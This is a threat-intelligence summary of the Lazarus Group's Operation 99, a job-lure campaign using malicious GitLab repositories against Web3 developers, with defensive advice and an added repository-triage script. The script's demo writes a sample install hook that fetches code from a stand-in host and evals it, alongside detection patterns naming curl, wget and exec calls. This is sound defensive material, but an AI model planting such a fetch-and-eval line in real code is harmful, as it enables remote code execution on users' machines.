Lazarus Group Targets Web3 Developers with Fake LinkedIn Profiles in Operation 99
Summary:
The North Korea-nexus APT Lazarus Group has been observed conducting a new cyber attack campaign dubbed Operation 99. The campaign targets software developers looking for freelance Web3 and cryptocurrency work, with the goal of planting malware in the victim's environment. The infection chain begins with fake recruiters on platforms like LinkedIn who use project tests and code reviews as the social engineering pretext. Once a victim takes the bait, they are directed to a rogue GitLab page and asked to clone a malicious GitLab repository. Lazarus is skilled at disguising its attacks: the repository looks harmless, but the cloned code connects to C2 infrastructure and installs malware on the victim's endpoint. The campaign is global, with victims in multiple countries, concentrated in Italy but also including the US. Its name comes from the malicious artifacts, whose version identifiers are labeled "pay99." The malware embedded in the repository acts as a downloader for the main payloads, Payload99, Brow99, and MCLIP. The malware is modular and flexible, and runs on Windows, macOS, and Linux:
- Payload99/73 (and its functionally similar Payload5346), which collects system data (e.g., files and clipboard content), terminates web browser processes, executes arbitrary code, and establishes a persistent connection to the C2 server
- Brow99/73, which steals data from web browsers to facilitate credential theft
- MCLIP, which monitors and exfiltrates keyboard and clipboard activity in real-time
This campaign was uncovered on January 9th, 2025, and builds on the job-themed social engineering seen in earlier successful Lazarus operations such as Operation Dream Job, which also targeted developers. North Korean threat actors keep refining these job-themed lures, making them more sophisticated and authentic in order to trick developers who might otherwise be wary of GitLab-themed phishing. By using AI-generated recruiter profiles and realistic HR communication, Lazarus builds convincing fake scenarios that can deceive even vigilant users, exploiting human trust and curiosity. Unlike its most recently documented campaign, in which Lazarus targeted the Defense Industrial Base sector with fake skills assessments for IT positions, Operation 99 focuses on Web3 and cryptocurrency developers and uses GitLab as an effective malware delivery vehicle. The downloaded payloads indicate that the primary goal is cyber espionage, with direct theft of cryptocurrency wallet keys pursued opportunistically when the chance arises. The malware's ability to run across Windows, macOS, and Linux highlights the adaptability of nation-state threat actors. These campaigns are double-pronged: they provide the financial means to fund the North Korean regime while stealing secrets from other countries, circumventing international sanctions.
Suggested Corrections:
The IT sector is especially vulnerable to targeted attacks due to an increase in remote work opportunities. To defend against this type of threat:
- Vigilance Against Social Engineering: Verify recruiters and job offers on platforms like LinkedIn.
- Repository Security: Scrutinize Git repositories before cloning, especially when working in high-stakes sectors.
- Endpoint Protection: Use advanced endpoint security solutions to detect unusual activity.
- Training and Awareness: Equip developers with the knowledge to identify red flags in emails, repositories, and LinkedIn profiles.
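One way to act on the "scrutinize Git repositories before cloning" item is a static triage pass over a cloned "coding test" before anything in it is installed or run. The script below is an added example, not code from the advisory or either vendor; the heuristics (npm lifecycle hooks, and a source file that mixes network access or blob decoding with dynamic code execution, the shape of a downloader) and the sample repository it builds are constructed for illustration.

```python
"""Pre-run triage of a cloned repository (added example, not from the advisory).
Heuristic only: flags install-time hooks and files that pair network access (or
blob decoding) with dynamic execution. Nothing in the repo is executed."""
import json, pathlib, re, tempfile

# npm scripts that run automatically on `npm install`, before anyone reads the code.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Files worth pattern-scanning (setup.py and Makefile also run at install/build time).
SOURCE_NAMES = {".js", ".mjs", ".ts", ".py", ".sh", "setup.py", "Makefile"}
PATTERNS = {  # constructed indicator patterns, not indicators from the page
    "network": re.compile(r"\b(fetch|axios|http\.get|urllib|requests|curl|wget)\b"),
    "exec": re.compile(r"\b(eval|exec|new Function|child_process|subprocess|os\.system)\b"),
    "decode": re.compile(r"\b(atob|base64|fromCharCode|b64decode)\b"),
}

def triage(repo: pathlib.Path) -> list[dict]:
    """Return one finding per suspicious file, without running anything in the repo."""
    findings = []
    for path in repo.rglob("*"):
        if not path.is_file() or ".git" in path.parts:
            continue
        rel, text = str(path.relative_to(repo)), path.read_text(errors="ignore")
        if path.name == "package.json":
            try:
                scripts = json.loads(text).get("scripts", {})
            except json.JSONDecodeError:
                scripts = {}
            hooks = [k for k in scripts if k in LIFECYCLE_HOOKS]
            if hooks:
                findings.append({"file": rel, "why": "lifecycle hook", "detail": hooks})
        elif path.suffix in SOURCE_NAMES or path.name in SOURCE_NAMES:
            hits = sorted(n for n, rx in PATTERNS.items() if rx.search(text))
            # fetch-and-run: network (or blob decoding) plus dynamic execution in one file
            if "exec" in hits and {"network", "decode"} & set(hits):
                findings.append({"file": rel, "why": "fetch-and-run", "detail": hits})
    return findings

def demo() -> list[dict]:
    """Build a constructed sample 'coding test' repo in a temp dir and triage it."""
    root = pathlib.Path(tempfile.mkdtemp())
    (root / "package.json").write_text(json.dumps(
        {"name": "coding-test", "scripts": {"postinstall": "node setup.js", "test": "jest"}}))
    (root / "setup.js").write_text(  # runs on install, fetches and evals remote code
        'const { execSync } = require("child_process");\n'
        'fetch("https://example.invalid/cfg").then(r => r.text()).then(s => eval(s));\n')
    (root / "index.js").write_text("module.exports = (a, b) => a + b;\n")  # benign
    return triage(root)
```

Run `triage(pathlib.Path("path/to/clone"))` on a real clone; a hit is a reason to read the flagged file in an isolated environment before installing, not proof of compromise.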
https://thehackernews.com/2025/01/lazarus-group-targets-web3-developers.html
https://securityscorecard.com/blog/operation-99-north-koreas-cyber-assault-on-software-developers/